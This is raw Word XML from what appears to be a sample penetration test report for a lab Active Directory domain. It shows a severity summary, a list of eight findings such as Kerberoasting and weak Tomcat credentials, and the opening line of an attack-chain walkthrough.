          <w:p w14:paraId="5C57C22C" w14:textId="77777777" w:rsidR="004E4CF5" w:rsidRPr="00C332E5" w:rsidRDefault="004E4CF5" w:rsidP="00C332E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C332E5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC10813" w14:textId="77777777" w:rsidR="004E4CF5" w:rsidRPr="004539C5" w:rsidRDefault="004E4CF5" w:rsidP="00C332E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C332E5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615F7E91" w14:textId="77777777" w:rsidR="004E4CF5" w:rsidRPr="00C332E5" w:rsidRDefault="004E4CF5" w:rsidP="00C332E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C332E5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4CF5" w14:paraId="621F4AB9" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2606" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1179CB2B" w14:textId="3E53B0E0" w:rsidR="004E4CF5" w:rsidRPr="004539C5" w:rsidRDefault="00A85451" w:rsidP="004E4CF5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0873E513" w14:textId="677EDE64" w:rsidR="004E4CF5" w:rsidRPr="00C332E5" w:rsidRDefault="00A85451" w:rsidP="004E4CF5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C332E5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6127C312" w14:textId="28E89C15" w:rsidR="004E4CF5" w:rsidRPr="00C332E5" w:rsidRDefault="00A85451" w:rsidP="004E4CF5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C332E5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006600"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2396" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D737A15" w14:textId="0A6C50BD" w:rsidR="004E4CF5" w:rsidRPr="00C332E5" w:rsidRDefault="00A85451" w:rsidP="001C6D4A">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C332E5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B57E1EE" w14:textId="71E42980" w:rsidR="007B0529" w:rsidRDefault="001C6D4A" w:rsidP="001C6D4A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Severity Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CAFB86" w14:textId="4C87304F" w:rsidR="00E54D62" w:rsidRDefault="004E4CF5" w:rsidP="00B8375E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Below is a high-level overview of each finding identified </w:t>
      </w:r>
      <w:r w:rsidR="00102F8A">
        <w:t>during</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> testing. These findings are covered in depth in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Technical_Findings_Details" w:history="1">
        <w:r w:rsidRPr="00D91E64">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Technical Findings Details</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D91E64">
        <w:t xml:space="preserve"> section</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of this report. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1257"/>
        <w:gridCol w:w="2521"/>
        <w:gridCol w:w="7022"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D91E64" w:rsidRPr="004E4CF5" w14:paraId="66AA797B" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="582" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="611FEF10" w14:textId="77777777" w:rsidR="00D91E64" w:rsidRPr="00D91E64" w:rsidRDefault="00D91E64" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D91E64">
              <w:t>Finding #</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2123192C" w14:textId="77777777" w:rsidR="00D91E64" w:rsidRPr="00D91E64" w:rsidRDefault="00D91E64" w:rsidP="00704565">
            <w:r w:rsidRPr="00D91E64">
              <w:t>Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A897716" w14:textId="77777777" w:rsidR="00D91E64" w:rsidRPr="00704565" w:rsidRDefault="00D91E64" w:rsidP="00704565">
            <w:r w:rsidRPr="00704565">
              <w:t>Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D91E64" w:rsidRPr="00253BCB" w14:paraId="0037D7FF"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35035281" w14:textId="77777777" w:rsidR="00D91E64" w:rsidRPr="0005451F" w:rsidRDefault="00D91E64" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0005451F">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B80EB24" w14:textId="77777777" w:rsidR="00D91E64" w:rsidRPr="00A85451" w:rsidRDefault="00D91E64" w:rsidP="00704565">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BC99A78" w14:textId="1F21EA73" w:rsidR="00D91E64" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00704565">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>LLMNR/NBT-NS Response Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC21AF" w:rsidRPr="00351832" w14:paraId="077D9D0A"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79660269" w14:textId="77777777" w:rsidR="00BC21AF" w:rsidRPr="0005451F" w:rsidRDefault="00BC21AF" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0005451F">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59777FDD" w14:textId="158B3FCC" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="587123F7" w14:textId="1C69F466" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak Kerberos Authentication (“Kerberoasting”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC21AF" w:rsidRPr="000C6D37" w14:paraId="3CE62855"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78FE4818" w14:textId="77777777" w:rsidR="00BC21AF" w:rsidRPr="0005451F" w:rsidRDefault="00BC21AF" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0005451F">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E20BB27" w14:textId="220D1058" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="58B89983" w14:textId="0311EF76" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local Administrator Password Re-Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC21AF" w:rsidRPr="000C6D37" w14:paraId="5FA503B4"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16147D02" w14:textId="7CE914F4" w:rsidR="00BC21AF" w:rsidRPr="0005451F" w:rsidRDefault="00BC21AF" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B0C6E00" w14:textId="6A38BC5C" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16E4B94A" w14:textId="56FCB7A0" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak Active Directory Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC21AF" w:rsidRPr="000C6D37" w14:paraId="08D3B17F"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52B79835" w14:textId="14D5C9C2" w:rsidR="00BC21AF" w:rsidRPr="0005451F" w:rsidRDefault="00BC21AF" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="685715BF" w14:textId="1D9EFEB3" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF3B3B"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6FEA4130" w14:textId="092C74A0" w:rsidR="00BC21AF" w:rsidRPr="00A85451" w:rsidRDefault="00BC21AF" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tomcat Manager Weak/Default Credentials</w:t>
            </w:r>
            <w:r w:rsidR="00A85451" w:rsidRPr="00A85451">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A85451" w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A85451" w:rsidRPr="000C6D37" w14:paraId="294AE784"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19D292B6" w14:textId="4C22BF0D" w:rsidR="00A85451" w:rsidRDefault="00A85451" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3E530205" w14:textId="57B65CD7" w:rsidR="00A85451" w:rsidRPr="00A85451" w:rsidRDefault="00A85451" w:rsidP="00A85451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1181529C" w14:textId="51B0A688" w:rsidR="00A85451" w:rsidRPr="00A85451" w:rsidRDefault="00A85451" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Insecure File Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A85451" w:rsidRPr="000C6D37" w14:paraId="27498FEA"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1A1E1ED9" w14:textId="6C0834A8" w:rsidR="00A85451" w:rsidRDefault="00A85451" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1092317E" w14:textId="4F363E54" w:rsidR="00A85451" w:rsidRPr="00A85451" w:rsidRDefault="00A85451" w:rsidP="00A85451">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="006600"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="006600"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53816D43" w14:textId="77426769" w:rsidR="00A85451" w:rsidRPr="00A85451" w:rsidRDefault="00A85451" w:rsidP="00F75CFC">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Directory </w:t>
            </w:r>
            <w:r w:rsidR="00F75CFC">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Listing</w:t>
            </w:r>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A85451" w:rsidRPr="000C6D37" w14:paraId="0B7BB9E2"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6A658253" w14:textId="2496C142" w:rsidR="00A85451" w:rsidRDefault="00A85451" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1167" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53459C44" w14:textId="380761BC" w:rsidR="00A85451" w:rsidRPr="00A85451" w:rsidRDefault="00A85451" w:rsidP="00BC21AF">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="0000FF"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85451">
              <w:rPr>
                <w:b/>
                <w:color w:val="0000FF"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3251" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3088CF0C" w14:textId="000959D0" w:rsidR="00A85451" w:rsidRPr="00A85451" w:rsidRDefault="00A85451" w:rsidP="001C6D4A">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Enhance Security Monitoring Capabilities </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64A61460" w14:textId="18DBB67F" w:rsidR="00D91E64" w:rsidRDefault="001C6D4A" w:rsidP="001C6D4A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Finding List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE326BD" w14:textId="77777777" w:rsidR="00305619" w:rsidRDefault="00305619">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FEEC9" w14:textId="4FEE6EEF" w:rsidR="00305619" w:rsidRDefault="00305619" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc106718125"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Internal Network Compromise Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="6478A596" w14:textId="226C955E" w:rsidR="00305619" w:rsidRDefault="00305619" w:rsidP="00DA6F73">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the course of the assessment </w:t>
      </w:r>
      <w:r w:rsidR="00D14781" w:rsidRPr="00D14781">
        <w:t>Hack The Box Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was able </w:t>
      </w:r>
      <w:r w:rsidR="00442CC7">
        <w:t>gain a foothold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and compromise the internal network, leading to full administrative control over th</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14781">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00D14781" w:rsidRPr="003260D5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidR="00D14781">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Active Directory domain. The steps below demonstrate the steps taken from initial access to </w:t>
      </w:r>
      <w:r w:rsidR="00102F8A">
        <w:t>compromise and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not include all vulnerabilities and misconfigurations discovered during the course of testing. Any issues not used as part of the path to compromise are listed as separate, standalone issues in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Technical_Findings_Details_1" w:history="1">
        <w:r w:rsidRPr="00305619">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Technical Findings Details</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> sect</w:t>
      </w:r>
      <w:r w:rsidR="003260D5">
        <w:t xml:space="preserve">ion, ranked by severity level. </w:t>
      </w:r>
      <w:r w:rsidR="003260D5" w:rsidRPr="003260D5">
        <w:t>The intent of this attack chain is to demonstrate to Inlanefreight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domain</w:t>
      </w:r>
      <w:r w:rsidR="003260D5" w:rsidRPr="004539C5">
        <w:t xml:space="preserve"> compromise</w:t>
      </w:r>
      <w:r w:rsidR="003260D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="A4B1CD"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5536E43A" w14:textId="0922A845" w:rsidR="00402C9B" w:rsidRDefault="00305619" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc106718126"/>
      <w:r w:rsidRPr="008166EC">
        <w:t>Detailed Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="48721FCB" w14:textId="20BFD66F" w:rsidR="00305619" w:rsidRDefault="00D14781" w:rsidP="00DA6F73">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00442CC7">
        <w:t>Hack The Box Academy</w:t>
      </w:r>
      <w:r w:rsidR="00305619" w:rsidRPr="00442CC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305619" w:rsidRPr="00305619">
